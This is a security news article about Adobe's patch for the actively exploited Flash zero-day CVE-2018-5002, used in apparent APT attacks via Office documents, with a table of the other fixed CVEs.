Adobe Patches Flash Zero-Day

Flash Player logo

Adobe has issued a security update for Flash Player today to patch a zero-day vulnerability exploited by attackers in the wild.

The vulnerability was discovered and independently reported by several security firms —ICEBRG, Tencent, and two security divisions from Chinese cyber-security giant Qihoo 360.

The vulnerability, tracked as CVE-2018-5002, impacts Adobe Flash Player and earlier versions. It was fixed with the release of Flash Player

Flash zero-day exploited via Office files

According to Qihoo 360 Core Security, attackers used the Flash zero-day for attacks against targets in the Middle East. It is believed that a nation-state-backed cyber-espionage group is behind the attacks.

“We boldly suspected that the targeted region is Doha, Qatar,” Qihoo 360 Core said today in a blog post detailing the zero-day.

Experts say the hackers used Office files to exploit this Flash zero-day. Attackers would deliver Office files to victims that would load a malicious SWF file from a remote server and execute it inside the Office document.

Flash zero-day CVE-2018-5002

The malicious SWF file would exploit CVE-2018-5002 to gain the ability to execute code on the user’s PC, and later infect him with another strain of malware.

Zero-day attacks in the making for three months

“The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target,” Qihoo experts said. “All clues show this is a typical APT attack.”

“We suggest all relevant organizations and users to update their Flash to the latest versions in a timely manner.”

Besides CVE-2018-5002, today’s Adobe Flash update also contains fixes for three other vulnerabilities. Flash Player updates are available for Windows, Mac, Linux, and Chrome OS users.

Vulnerability Category Vulnerability Impact Severity CVE Number
Type Confusion Arbitrary Code Execution Critical CVE-2018-4945
Integer Overflow Information Disclosure Important CVE-2018-5000
Out-of-bounds read Information Disclosure Important CVE-2018-5001
Stack-based buffer overflow Arbitrary Code Execution Critical CVE-2018-5002

This is the second Flash Player zero-day spotted this year. In January, North Korean hackers deployed a first Flash zero-day (CVE-2018-4878) against targets in South Korea.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Most Popular

To Top